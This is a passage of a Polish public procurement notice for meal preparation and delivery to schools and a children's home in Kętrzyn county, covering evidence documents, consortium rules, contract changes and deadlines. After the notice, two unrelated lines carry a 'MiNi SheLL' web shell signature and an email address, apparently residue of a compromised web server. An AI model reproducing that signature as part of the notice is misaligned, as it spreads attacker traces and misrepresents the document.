organizacji kuchni uzupełniony o dane dotyczące organizowanej na potrzeby zamówienia kuchni oraz wskazane w tym załączniku dokumenty i oświadczenia. <br/>2. Podmiotowe środki dowodowe winny potwierdzić spełnienie wymagań w zakresie lokalizacji kuchni itp.:<br/>1) w ZADANIU II kuchnia na potrzeby zamówienia powinna być organizowana w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Poznańskiej 21 w Kętrzynie (liczonej po istniejących utwardzonych drogach publicznych); <br/>2) w ZADANIU III kuchnia na potrzeby zamówienia powinna być organizowana w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Klonowej 2B w Kętrzynie (liczonej po istniejących utwardzonych drogach publicznych).<br/>3. Przedmiotowe środki dowodowe sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. <br/>4. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <br/>5. W przypadku gdy przedmiotowe środki dowodowe zostały wystawione przez upoważnione podmioty inne niż wykonawca, wykonawca wspólnie ubiegający się o udzielenie zamówienia lub podmiot udostępniający zasoby, zwane dalej &#34;upoważnionymi podmiotami&#34;: <br/>1)	jako dokument elektroniczny - przekazuje się ten dokument; <br/>2)	jako dokument w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej; <br/>- poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa wyżej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia. <br/>6. Przez cyfrowe odwzorowanie, o którym mowa wyżej należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału. <br/>7. Przedmiotowe środki dowodowe niewystawione przez upoważnione podmioty przekazuje się: <br/>1)	w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym wykonawcy lub wykonawcy wspólnie ubiegającego się o udzielenie zamówienia; <br/>2)	gdy zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej;<br/> - poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa wyżej dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia. <br/>8. Wymienione w ust. 2 środki podlegają uzupełnieniu na zasadach określonych w rozdz. XXI ust. 8 pkt 6 SWZ. <br/>9. W przypadku konieczności uzyskania dodatkowych informacji lub wyjaśnienia wątpliwości, zastrzeżeń Zamawiającemu służy prawo do żądania wyjaśnień, w tym przedstawienia kopii decyzji PIS o zatwierdzeniu zakładu, w trybie art. 223 ust. 1 Pzp.<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. XX SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zał. nr 5 do SWZ – formularz w/s organizacji kuchni oraz wskazane w tym załączniku dokumenty i oświadczenia Wykonawcy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. KOMPLETNA OFERTA POWINNA ZAWIERAĆ:<br/>1)	formularz oferty wg zał. nr 1 do SWZ; <br/>2)	oświadczenie z art. 125 ust. 1 Wykonawców o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału odpowiednio do ZADAŃ, na które będzie składania oferta - wg zał. nr 2 do SWZ;<br/>1)	formularz w/w organizacji kuchni (przedmiotowy środek dowodowy) - wg zał. nr 5 do SWZ;<br/>2)	decyzja w/s zatwierdzenia zakładu (zał. do przedmiotowego środka dowodowego) - (jeśli dotyczy);<br/>3)	oświadczenie z art. 117 ust. 4 Wykonawców wspólnie ubiegających się o zamówienie odpowiednio do ZADAŃ, na które będzie składania oferta - wg zał. nr 3 do SWZ (jeśli dotyczy);<br/>4)	zobowiązanie podmiotu udostępniającego zasoby Wykonawcy do dyspozycji na potrzeby realizacji zamówienia wraz z oświadczeniem z art. 125 ust. 5 odpowiednio do ZADAŃ, na które Wykonawca składa ofertę o podmiot udostępnia zasoby - wg zał. nr 4 do SWZ (jeśli dotyczy);<br/>5)	pełnomocnictwa dla osób podpisujących wszystkie dokumenty ofertowe, o ile prawo składania oświadczeń woli w imieniu Wykonawcy nie wynika z dokumentów rejestrowych - ust. 15 (jeżeli występuje); <br/>6)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie – wg zasad opisanych w ust. 16 (jeżeli występuje) <br/>7)	pełnomocnictwo do reprezentowania Podmiotu udostępniającego zasoby odpowiednio do ZADAŃ, na które Wykonawca składa ofertę o podmiot udostępnia zasoby - ust. 16 (jeżeli dotyczy lub występuje);<br/>- przy czym formularz oferty, oświadczeń muszą być złożone w oryginale. <br/>2. Zamawiający żądać będzie od Wykonawcy polegającego na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Pzp przedstawienia w odniesieniu do tych pomiotów oświadczeń, o których mowa w rozdz. XXI SWZ w ust. 1. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 18. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>1)	Wykonawcy ustanawiają pełnomocnika co najmniej do reprezentowania ich w postępowaniu;<br/>2)	treść pełnomocnictwa Wykonawców wspólnie ubiegających się o zamówienie winna: <br/>a) identyfikować wszystkich Wykonawców; <br/>b) wskazywać jakiego postępowania dotyczy; <br/>c) wskazywać ustanowionego pełnomocnika;<br/>d) określać zakres umocowania pełnomocnika; <br/>e) zwierać oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia;<br/>f) być podpisana przez osoby upoważnione do reprezentowania poszczególnych Wykonawców i w formie oryginału lub w kopii poświadczonej notarialnie musi znajdować się w ofercie wspólnej Wykonawców; pełnomocnictwo może być udzielone w szczególności: łącznie przez wszystkich Wykonawców (jeden dokument) albo oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców);<br/>3)	jeśli pełnomocnik Wykonawców udzieli „dalszego pełnomocnictwa”, upoważnienie do wykonania takiej czynności powinno jasno wynikać z pełnomocnictwa Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>4)	Wykonawcy solidarnie odpowiadają za podpisanie umowy, wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>5)	w ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z pełnomocnikiem; korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako Pełnomocnik; <br/>6)	poświadczenie dokumentów odbywa się zgodnie z zapisami niniejszej SWZ oraz § 14 ust. 3 Rozporządzenia w sprawie rodzajów dokumentów jakich może żądać zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia publicznego;<br/>7)	oferta wspólna składana przez dwóch lub więcej Wykonawców winna spełniać niżej wymienione wymagania:<br/>a) formularz oferty i dokumenty podmiotowe składa wyłoniony LIDER (pełnomocnik);<br/>b) dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia i o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu (powyższe dotyczy również wspólników spółki cywilnej);<br/>c) kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców;<br/>8)	załączone do oferty dokumenty powinny potwierdzać, że osoby podpisujące pełnomocnictwo są uprawnione do składania oświadczeń woli w imieniu Wykonawcy; <br/>9)	jeżeli oferta Wykonawców wspólnie ubiegających się o uzyskanie zamówienia zostanie wybrana, Wykonawcy składający ofertę wspólną (zwani dalej konsorcjum) będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą współpracę, która powinna zawierać:<br/>a) określenie członków konsorcjum;<br/>b) wskazanie celu gospodarczego ustanowienia konsorcjum, w sposób precyzyjny wskazać nazwę inwestycji, jej lokalizację, określenie inwestora (zamawiającego); <br/>c) określenie udziału stron umowy w realizacji przedmiotu zamówienia;<br/>d) szczegółowy podział prac, który jasno określi punkty styku między konsorcjantami podczas realizacji przedmiotu zamówienia;<br/>e) określenie lidera Konsorcjum, jego praw i obowiązków;<br/>f) postanowienia dotyczące wygaśnięcia umowy konsorcjum, określenie czasu obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości. Konsorcjum winno być powołane najpóźniej w dniu upływu terminu składania ofert;<br/>10)	wypełniając formularz oferty jak również inne dokumenty powołujące się na Wykonawcę; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane Wykonawców wspólnie ubiegających się o zamówienie;<br/>11)	wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w niniejszym ustępie. Z zastrzeżeniem określonym w uwagach Spółka cywilna ubiegająca się o zamówienie powinna wyznaczyć pełnomocnika do jej ...<br/>Numeracja zgodna z SWZ, pełny tekst w rozdz. XV SW <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności.<br/>2.	Strony przewidują możliwość zmiany postanowień niniejszej umowy w następujących przypadkach:<br/>1)	zmiany stawki podatku VAT – dopuszczalna jest zmiana cen jednostkowych stosownie do stawki ustalonej w przepisach prawa obowiązującego w okresie trwania umowy; <br/>	Wykonawca, po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług, winien przestawić wniosek zawierający wyczerpujące uzasadnienie faktyczne i prawne, z wyliczeniem wpływu w/w zmiany na ponoszone przez Wykonawcę koszty wykonania zamówienia oraz ze wskazaniem: wartości, o jaką powinny wzrosnąć/ obniżyć się ceny jednostkowe brutto przygotowywania posiłków w związku ze zmianami opisanymi wyżej oraz terminu od którego zmiana umowy powinna wejść w życie;<br/>2)	zmiany minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej ustalonych na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę - w przypadku zaistnienia łącznie okoliczności:<br/>a)	Wykonawca zabezpieczy możliwości dokonania zmian umowy w w/w zakresie przedstawiając Zamawiającemu przed podpisaniem umowy dokumenty, z których w sposób jednoznaczny wynika, kto (imię i nazwisko), w jakim zakresie jest zatrudniony bezpośrednio przy realizacji zamówienia (rodzaj umowy, wielość etatu) i otrzymuje minimalne wynagrodzenia za pracę/minimalną stawkę godzinową ustalone na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę; brak takiej informacji przed podpisaniem umowy oznacza, że Wykonawca założył, iż ewentualne zmiany podane w niniejszym punkcie nie będą miały istotnego wpływu na koszty wykonania zamówienia - w przeciwnym wypadku Wykonawca musi udowodnić Zamawiającemu, iż nie był on wstanie dostarczyć takiej informacji we wskazanym terminie; <br/>b)	Wykonawca, po wejściu w życie zmiany wysokości minimalnego wynagrodzenia za pracę/minimalnej stawki godzinowej w 2025 roku, winien przedstawić wpływ tej zmiany na koszt Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń pracowników realizujących usługę do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia; składając wniosek zawierający wyczerpujące uzasadnienie faktyczne i prawne, z wyliczeniem wpływu zmiany na ponoszone przez Wykonawcę koszty wykonania zamówienia oraz ze wskazaniem wartości, o jaką powinny wzrosnąć ceny jednostkowe przygotowywania posiłków w związku ze zmianami opisanymi wyżej; <br/>UWAGA: Wniosek powinien obejmować jedynie dodatkowe koszty realizacji Umowy, które Wykonawca obowiązkowo ponosi w związku z podwyższeniem wysokości płacy minimalnej co powinno zostać wykazane w kalkulacji odnoszącej się wyłącznie do wynagrodzenia pracowników, wykonujących prace bezpośrednio związane z realizacją przedmiotu umowy; Zamawiający nie będzie akceptował, kosztów wynikających z podwyższenia wynagrodzeń pracownikom Wykonawcy, które nie są konieczne w celu ich dostosowania do wysokości minimalnego wynagrodzenia za pracę, w szczególności koszty podwyższenia wynagrodzenia w kwocie przewyższającej wysokość płacy minimalnej.<br/>3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne; <br/>	Wykonawca, po wejściu w życie zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenia społeczne lub zdrowotne, winien przestawić wniosek zawierający wyczerpujące uzasadnienie faktyczne i prawne, z wyliczeniem wpływu zmiany na ponoszone przez wykonawcę koszty wykonania zamówienia oraz ze wskazaniem wartości, o jaką powinny wzrosnąć ceny jednostkowe przygotowywania posiłków w związku ze zmianami opisanymi wyżej;<br/>UWAGA: Wniosek powinien ....<br/>Pełna informacja w zał. nr 9a, 9b i 9c do SWZ - projektu umów <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformie zakupowej pod adresem: https://platformazakupowa.pl/887453</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-13 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zarządu Powiatu w Kętrzynie uchwałą nr 1562/2024 z dnia 18 stycznia 2024r. zmienioną uchwałą nr 1607/2024 z dnia 29 lutego 2024r. na podstawie art. 41 ustawy z dnia 11 września 2019r. Pzp wyznaczył Centrum Usług Wspólnych Powiatu Kętrzyńskiego jako zamawiającego do przeprowadzenia w imieniu i na rzecz jednostek organizacyjnych powiatu kętrzyńskiego postępowań dotyczących usług przygotowania, dostarczania i podawania gotowych posiłków w jednostkach organizacyjnych Powiatu Kętrzyńskiego: 1) Zespołu Szkół w Reszlu im. M. Rataja w Reszlu, ul. Łukasińskiego 3, <br/>2) Powiatowego Centrum Edukacyjne w Kętrzynie, ul. Poznańska 21, <br/>3) Powiatowego Domu Dziecka w Kętrzynie.<br/>2. W myśl art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania wyklucza się:<br/>1) Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>W związku z powyższym Zamawiający informuje, iż z racji bezwzględnego obowiązywania i bezpośredniego stosowania przedmiotowych regulacji prawnych (obok ustawy Pzp) Wykonawcy, wobec których istnieją okoliczności, o których mowa w art. 7 ust. 1 ustawy, podlegać będą wykluczeniu z udziału w niniejszym postępowaniu wprost na podstawie przedmiotowych szczególnych regulacji prawnych – niezależnie i obok podstaw wykluczenia statuowanych w art. 108 Pzp, w związku z czym złożone przez nich oferty będą odrzucane jako oferty złożone przez Wykonawców podlegających wykluczeniu z udziału w postępowaniu i oferty nieważne na podstawie odrębnych przepisów – art. 226 ust. 1 pkt 4 Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com